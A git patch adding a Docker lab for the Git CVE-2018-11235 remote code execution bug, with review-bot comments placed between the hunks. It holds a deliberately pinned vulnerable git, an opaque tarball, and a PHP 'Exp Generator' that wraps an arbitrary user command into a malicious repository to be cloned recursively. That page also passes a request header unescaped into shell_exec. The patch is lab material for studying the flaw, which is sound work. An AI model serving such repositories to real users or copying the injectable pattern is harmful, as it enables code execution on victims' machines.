From c4b3dcc7f47950b6e6efa9bc9896f98a0c55100a Mon Sep 17 00:00:00 2001 From: Medicean Date: Fri, 1 Jun 2018 16:24:53 +0800 Subject: [PATCH] =?UTF-8?q?(Add=20Vul:=20Git)=20Git=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E=20CVE-20?= =?UTF-8?q?18-11235?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 4 + g/git/1/Dockerfile | 17 +++ g/git/1/README.md | 1 + g/git/1/exp/Dockerfile | 26 ++++ g/git/1/exp/src/000-default.conf | 16 +++ g/git/1/exp/src/apache2.conf | 228 +++++++++++++++++++++++++++++++ g/git/1/exp/src/base.tar.gz | Bin 0 -> 6562 bytes g/git/1/exp/src/build.sh | 29 ++++ g/git/1/exp/src/index.php | 40 ++++++ g/git/1/exp/src/start.sh | 3 + g/git/1/src/apache2.conf | 228 +++++++++++++++++++++++++++++++ g/git/1/src/index.php | 23 ++++ g/git/1/src/start.sh | 3 + g/git/README.md | 4 + 14 files changed, 622 insertions(+) create mode 100644 g/git/1/Dockerfile create mode 100644 g/git/1/README.md create mode 100644 g/git/1/exp/Dockerfile create mode 100644 g/git/1/exp/src/000-default.conf create mode 100644 g/git/1/exp/src/apache2.conf create mode 100644 g/git/1/exp/src/base.tar.gz create mode 100644 g/git/1/exp/src/build.sh create mode 100644 g/git/1/exp/src/index.php create mode 100644 g/git/1/exp/src/start.sh create mode 100644 g/git/1/src/apache2.conf create mode 100644 g/git/1/src/index.php create mode 100644 g/git/1/src/start.sh create mode 100644 g/git/README.md diff --git a/README.md b/README.md index 0d5bb7c..585e56b 100644 --- a/README.md +++ b/README.md @@ -77,6 +77,10 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037 * [FFmpeg](./i/ffmpeg/) +### [G](./g/)
+ +* [Git](./g/git/) + ### [I](./i/)
* [ImageMagick](./i/imagemagick/)
diff --git a/g/git/1/Dockerfile b/g/git/1/Dockerfile
new file mode 100644
index 0000000..22fd79c
--- /dev/null
+++ b/g/git/1/Dockerfile
@@ -0,0 +1,17 @@
+FROM medicean/vulapps:base_lamp
+
+RUN set -x \
+ && apt-get update \
+ && apt-get install -y git=1:1.9.1-1 \
+ && rm -rf /var/www/html/* \
+ && mkdir -p /var/www/html/repos
+
+COPY src/apache2.conf /etc/apache2/apache2.conf
+COPY src/index.php /var/www/html/index.php
+COPY src/start.sh /start.sh
+
+RUN chmod +x /start.sh \
+ && chown -R www-data:www-data /var/www/html
+
+EXPOSE 80
+CMD ["/start.sh"]
diff --git a/g/git/1/README.md b/g/git/1/README.md
new file mode 100644
index 0000000..e2f0103
--- /dev/null
+++ b/g/git/1/README.md
@@ -0,0 +1 @@
+## Git远程代码执行漏洞(CVE-2018-11235)
diff --git a/g/git/1/exp/Dockerfile b/g/git/1/exp/Dockerfile
new file mode 100644
index 0000000..eee1c58
--- /dev/null
+++ b/g/git/1/exp/Dockerfile
@@ -0,0 +1,26 @@
+FROM medicean/vulapps:base_lamp
+
+COPY src/base.tar.gz /tmp/base.tar.gz
+
+RUN set -x \
+ && a2enmod cgi alias env rewrite \
+ && apt-get update \
+ && apt-get install -y git=1:1.9.1-1 git-core \
+ && rm -rf /var/www/html/* \
+ && mkdir -p /var/www/html/repos \
+ && tar -zxvf /tmp/base.tar.gz -C /var/www/html/repos/ \
+ && apt-get remove -y mysql-server mysql-client \
+ && apt-get clean \
+ && rm -rf /var/lib/apt/lists/*
+
+COPY src/apache2.conf /etc/apache2/apache2.conf
+COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf
+COPY src/index.php /var/www/html/index.php
+COPY src/build.sh /var/www/html/build.sh
+COPY src/start.sh /start.sh
+
+RUN chmod +x /start.sh \
+ && chown -R www-data:www-data /var/www/html
+
+EXPOSE 80
+CMD ["/start.sh"]
diff --git a/g/git/1/exp/src/000-default.conf b/g/git/1/exp/src/000-default.conf
new file mode 100644
index 0000000..1565af0
--- /dev/null
+++ b/g/git/1/exp/src/000-default.conf
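Review bot: In g/git/1/Dockerfile the pin `git=1:1.9.1-1` has no comment saying it is deliberate, so a later cleanup could bump the package and silently remove the behaviour this image exists to demonstrate; I would add `# Deliberately pinned to a git build affected by CVE-2018-11235 - do not upgrade` above the RUN. The same RUN omits the `apt-get clean`, `rm -rf /var/lib/apt/lists/*` and `apt-get remove -y mysql-server mysql-client` steps that g/git/1/exp/Dockerfile performs, so the target image presumably keeps services from base_lamp that are unrelated to this vulnerability. `FROM medicean/vulapps:base_lamp` is a mutable tag; referencing it by digest would keep the lab reproducible.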
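Review bot: In g/git/1/exp/Dockerfile, `COPY src/build.sh /var/www/html/build.sh` places the build script under the DocumentRoot, and the later `chown -R www-data:www-data /var/www/html` makes both it and index.php writable by the account that serves requests. Since index.php runs that script through /bin/sh, the web user can change code it will execute later. Keeping build.sh in a root-owned directory outside /var/www/html and narrowing the ownership change to `chown -R www-data:www-data /var/www/html/repos` would leave only the generated repositories writable; index.php would need the new script path.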
@@ -0,0 +1,16 @@
+
+ SetEnv GIT_PROJECT_ROOT /var/www/html/repos
+ SetEnv GIT_HTTP_EXPORT_ALL
+ ScriptAlias /git/ /usr/lib/git-core/git-http-backend/
+
+DocumentRoot /var/www/html
+
+
+ Options +ExecCgi -MultiViews +SymLinksIfOwnerMatch
+ AllowOverride none
+ Order allow,deny
+ Allow from all
+ Require all granted
+
+
+
diff --git a/g/git/1/exp/src/apache2.conf b/g/git/1/exp/src/apache2.conf
new file mode 100644
index 0000000..1576d89
--- /dev/null
+++ b/g/git/1/exp/src/apache2.conf
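Review bot: In g/git/1/exp/src/000-default.conf the access block lists `Order allow,deny` and `Allow from all` next to `Require all granted`; the first two are Apache 2.2 directives that only work through mod_access_compat, and the httpd documentation discourages mixing them with `Require`. Keeping `Require all granted` alone gives the same result on 2.4. The container tags are not visible on this page, so I cannot tell which directory receives `+ExecCgi`; if it is the whole DocumentRoot, limiting it to the git-http-backend path would be tighter. A one-line comment noting that `GIT_HTTP_EXPORT_ALL` serves every repository under /var/www/html/repos without authentication would help anyone who reuses this file outside the lab.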
@@ -0,0 +1,228 @@ +# This is the main Apache server configuration file. It contains the +# configuration directives that give the server its instructions. +# See http://httpd.apache.org/docs/2.4/ for detailed information about +# the directives and /usr/share/doc/apache2/README.Debian about Debian specific +# hints. +# +# +# Summary of how the Apache 2 configuration works in Debian: +# The Apache 2 web server configuration in Debian is quite different to +# upstream's suggested way to configure the web server. This is because Debian's +# default Apache2 installation attempts to make adding and removing modules, +# virtual hosts, and extra configuration directives as flexible as possible, in +# order to make automating the changes and administering the server as easy as +# possible. + +# It is split into several files forming the configuration hierarchy outlined +# below, all located in the /etc/apache2/ directory: +# +# /etc/apache2/ +# |-- apache2.conf +# | `-- ports.conf +# |-- mods-enabled +# | |-- *.load +# | `-- *.conf +# |-- conf-enabled +# | `-- *.conf +# `-- sites-enabled +# `-- *.conf +# +# +# * apache2.conf is the main configuration file (this file). It puts the pieces +# together by including all remaining configuration files when starting up the +# web server. +# +# * ports.conf is always included from the main configuration file. It is +# supposed to determine listening ports for incoming connections which can be +# customized anytime. +# +# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ +# directories contain particular configuration snippets which manage modules, +# global configuration fragments, or virtual host configurations, +# respectively. +# +# They are activated by symlinking available configuration files from their +# respective *-available/ counterparts. These should be managed by using our +# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. 
See +# their respective man pages for detailed information. +# +# * The binary is called apache2. Due to the use of environment variables, in +# the default configuration, apache2 needs to be started/stopped with +# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not +# work with the default configuration. + + +# Global configuration +# + +# +# ServerRoot: The top of the directory tree under which the server's +# configuration, error, and log files are kept. +# +# NOTE! If you intend to place this on an NFS (or otherwise network) +# mounted filesystem then please read the Mutex documentation (available +# at ); +# you will save yourself a lot of trouble. +# +# Do NOT add a slash at the end of the directory path. +# +#ServerRoot "/etc/apache2" + +# +# The accept serialization lock file MUST BE STORED ON A LOCAL DISK. +# +Mutex file:${APACHE_LOCK_DIR} default + +# +# PidFile: The file in which the server should record its process +# identification number when it starts. +# This needs to be set in /etc/apache2/envvars +# +PidFile ${APACHE_PID_FILE} + +# +# Timeout: The number of seconds before receives and sends time out. +# +Timeout 300 + +# +# KeepAlive: Whether or not to allow persistent connections (more than +# one request per connection). Set to "Off" to deactivate. +# +KeepAlive On + +# +# MaxKeepAliveRequests: The maximum number of requests to allow +# during a persistent connection. Set to 0 to allow an unlimited amount. +# We recommend you leave this number high, for maximum performance. +# +MaxKeepAliveRequests 100 + +# +# KeepAliveTimeout: Number of seconds to wait for the next request from the +# same client on the same connection. +# +KeepAliveTimeout 5 + + +# These need to be set in /etc/apache2/envvars +User ${APACHE_RUN_USER} +Group ${APACHE_RUN_GROUP} + +# +# HostnameLookups: Log the names of clients or just their IP addresses +# e.g., www.apache.org (on) or 204.62.129.132 (off). 
+# The default is off because it'd be overall better for the net if people +# had to knowingly turn this feature on, since enabling it means that +# each client request will result in AT LEAST one lookup request to the +# nameserver. +# +HostnameLookups Off + +# ErrorLog: The location of the error log file. +# If you do not specify an ErrorLog directive within a +# container, error messages relating to that virtual host will be +# logged here. If you *do* define an error logfile for a +# container, that host's errors will be logged there and not here. +# +ErrorLog ${APACHE_LOG_DIR}/error.log + +# +# LogLevel: Control the severity of messages logged to the error_log. +# Available values: trace8, ..., trace1, debug, info, notice, warn, +# error, crit, alert, emerg. +# It is also possible to configure the log level for particular modules, e.g. +# "LogLevel info ssl:warn" +# +LogLevel warn + +# Include module configuration: +IncludeOptional mods-enabled/*.load +IncludeOptional mods-enabled/*.conf + +# Include list of ports to listen on +Include ports.conf + + +# Sets the default security model of the Apache2 HTTPD server. It does +# not allow access to the root filesystem outside of /usr/share and /var/www. +# The former is used by web applications packaged in Debian, +# the latter may be used for local directories served by the web server. If +# your system is serving content from a sub-directory in /srv you must allow +# access here, or in any related virtual host. 
+ + Options FollowSymLinks + AllowOverride None + Require all denied + + + + AllowOverride None + Require all granted + + + + Options Indexes FollowSymLinks + AllowOverride None + Require all granted + + +# +# Options Indexes FollowSymLinks +# AllowOverride None +# Require all granted +# + + Options Indexes FollowSymLinks + + SetHandler application/x-httpd-php-source + Order Deny,Allow + Allow from all + + + + + +# AccessFileName: The name of the file to look for in each directory +# for additional configuration directives. See also the AllowOverride +# directive. +# +AccessFileName .htaccess + +# +# The following lines prevent .htaccess and .htpasswd files from being +# viewed by Web clients. +# + + Require all denied + + + +# +# The following directives define some format nicknames for use with +# a CustomLog directive. +# +# These deviate from the Common Log Format definitions in that they use %O +# (the actual bytes sent including headers) instead of %b (the size of the +# requested file), because the latter makes it impossible to detect partial +# requests. +# +# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. +# Use mod_remoteip instead. +# +LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined +LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined +LogFormat "%h %l %u %t \"%r\" %>s %O" common +LogFormat "%{Referer}i -> %U" referer +LogFormat "%{User-agent}i" agent + +# Include of directories ignores editors' and dpkg's backup files, +# see README.Debian for details. + +# Include generic snippets of statements +IncludeOptional conf-enabled/*.conf + +# Include the virtual host configurations: +IncludeOptional sites-enabled/*.conf + +# vim: syntax=apache ts=4 sw=4 sts=4 sr noet 
diff --git a/g/git/1/exp/src/base.tar.gz b/g/git/1/exp/src/base.tar.gz new file mode 100644 index 0000000000000000000000000000000000000000..476493596128a528122d89ebf3187fea1e78cbd9 GIT binary patch literal 6562 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 U!6+C7qhRm>0AX$K!T_KE0I5x`!T + + + VulApps CVE-2018-11235 Exp Generator + + +

VulApps CVE-2018-11235 Exp Generator

+
+
+
+ +
+ 查看已有仓库
+ +请不要使用 127.0.0.1 这个地址来访问此页面"); + } + + if (isset($_REQUEST['command']) && !empty($_REQUEST['command'])) { + $command = str_replace("\r\n", "\n", $_REQUEST['command']); + file_put_contents("/tmp/evil.sh", $command); + // @chdir("/var/www/html/repos/"); + $str="QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm"; + str_shuffle($str); + $repo_name=substr(str_shuffle($str),26,10); + + shell_exec("/bin/sh /var/www/html/build.sh ".$repo_name." ".$_SERVER['HTTP_HOST']); + + $expurl=$_SERVER['REQUEST_SCHEME']."://".$_SERVER['HTTP_HOST']."/git/".$repo_name; + echo "生成Exp成功:
"; + echo "Exp URL: ".$expurl."
"; + echo "如果你想在自己机器上测试,执行:
"; + echo "git clone --recurse ".$expurl; + } +?> + + diff --git a/g/git/1/exp/src/start.sh b/g/git/1/exp/src/start.sh new file mode 100644 index 0000000..3f737e7 --- /dev/null +++ b/g/git/1/exp/src/start.sh @@ -0,0 +1,3 @@ +#!/bin/bash +/etc/init.d/apache2 restart +/usr/bin/tail -f /dev/null diff --git a/g/git/1/src/apache2.conf b/g/git/1/src/apache2.conf new file mode 100644 index 0000000..1576d89 --- /dev/null +++ b/g/git/1/src/apache2.conf 
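Review bot: In g/git/1/exp/src/index.php the `shell_exec` call concatenates `$_SERVER['HTTP_HOST']` directly into a `/bin/sh` command line, so the generator page itself passes shell metacharacters from a request header to the shell, independently of the script it is meant to package; the same value is echoed back unescaped through `$expurl`. Quote the arguments, `shell_exec("/bin/sh /var/www/html/build.sh ".escapeshellarg($repo_name)." ".escapeshellarg($_SERVER['HTTP_HOST']));`, and print the URL with `htmlspecialchars($expurl, ENT_QUOTES)`. Every request also writes to the fixed path /tmp/evil.sh, so two concurrent requests can presumably overwrite each other's file before build.sh reads it (build.sh is not visible on this page); a per-request file from `tempnam()` passed to the script would avoid that. The top of this file's hunk is missing from the page, so this covers only the visible lines.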
@@ -0,0 +1,228 @@ +# This is the main Apache server configuration file. It contains the +# configuration directives that give the server its instructions. +# See http://httpd.apache.org/docs/2.4/ for detailed information about +# the directives and /usr/share/doc/apache2/README.Debian about Debian specific +# hints. +# +# +# Summary of how the Apache 2 configuration works in Debian: +# The Apache 2 web server configuration in Debian is quite different to +# upstream's suggested way to configure the web server. This is because Debian's +# default Apache2 installation attempts to make adding and removing modules, +# virtual hosts, and extra configuration directives as flexible as possible, in +# order to make automating the changes and administering the server as easy as +# possible. + +# It is split into several files forming the configuration hierarchy outlined +# below, all located in the /etc/apache2/ directory: +# +# /etc/apache2/ +# |-- apache2.conf +# | `-- ports.conf +# |-- mods-enabled +# | |-- *.load +# | `-- *.conf +# |-- conf-enabled +# | `-- *.conf +# `-- sites-enabled +# `-- *.conf +# +# +# * apache2.conf is the main configuration file (this file). It puts the pieces +# together by including all remaining configuration files when starting up the +# web server. +# +# * ports.conf is always included from the main configuration file. It is +# supposed to determine listening ports for incoming connections which can be +# customized anytime. +# +# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ +# directories contain particular configuration snippets which manage modules, +# global configuration fragments, or virtual host configurations, +# respectively. +# +# They are activated by symlinking available configuration files from their +# respective *-available/ counterparts. These should be managed by using our +# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. 
See +# their respective man pages for detailed information. +# +# * The binary is called apache2. Due to the use of environment variables, in +# the default configuration, apache2 needs to be started/stopped with +# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not +# work with the default configuration. + + +# Global configuration +# + +# +# ServerRoot: The top of the directory tree under which the server's +# configuration, error, and log files are kept. +# +# NOTE! If you intend to place this on an NFS (or otherwise network) +# mounted filesystem then please read the Mutex documentation (available +# at ); +# you will save yourself a lot of trouble. +# +# Do NOT add a slash at the end of the directory path. +# +#ServerRoot "/etc/apache2" + +# +# The accept serialization lock file MUST BE STORED ON A LOCAL DISK. +# +Mutex file:${APACHE_LOCK_DIR} default + +# +# PidFile: The file in which the server should record its process +# identification number when it starts. +# This needs to be set in /etc/apache2/envvars +# +PidFile ${APACHE_PID_FILE} + +# +# Timeout: The number of seconds before receives and sends time out. +# +Timeout 300 + +# +# KeepAlive: Whether or not to allow persistent connections (more than +# one request per connection). Set to "Off" to deactivate. +# +KeepAlive On + +# +# MaxKeepAliveRequests: The maximum number of requests to allow +# during a persistent connection. Set to 0 to allow an unlimited amount. +# We recommend you leave this number high, for maximum performance. +# +MaxKeepAliveRequests 100 + +# +# KeepAliveTimeout: Number of seconds to wait for the next request from the +# same client on the same connection. +# +KeepAliveTimeout 5 + + +# These need to be set in /etc/apache2/envvars +User ${APACHE_RUN_USER} +Group ${APACHE_RUN_GROUP} + +# +# HostnameLookups: Log the names of clients or just their IP addresses +# e.g., www.apache.org (on) or 204.62.129.132 (off). 
+# The default is off because it'd be overall better for the net if people +# had to knowingly turn this feature on, since enabling it means that +# each client request will result in AT LEAST one lookup request to the +# nameserver. +# +HostnameLookups Off + +# ErrorLog: The location of the error log file. +# If you do not specify an ErrorLog directive within a +# container, error messages relating to that virtual host will be +# logged here. If you *do* define an error logfile for a +# container, that host's errors will be logged there and not here. +# +ErrorLog ${APACHE_LOG_DIR}/error.log + +# +# LogLevel: Control the severity of messages logged to the error_log. +# Available values: trace8, ..., trace1, debug, info, notice, warn, +# error, crit, alert, emerg. +# It is also possible to configure the log level for particular modules, e.g. +# "LogLevel info ssl:warn" +# +LogLevel warn + +# Include module configuration: +IncludeOptional mods-enabled/*.load +IncludeOptional mods-enabled/*.conf + +# Include list of ports to listen on +Include ports.conf + + +# Sets the default security model of the Apache2 HTTPD server. It does +# 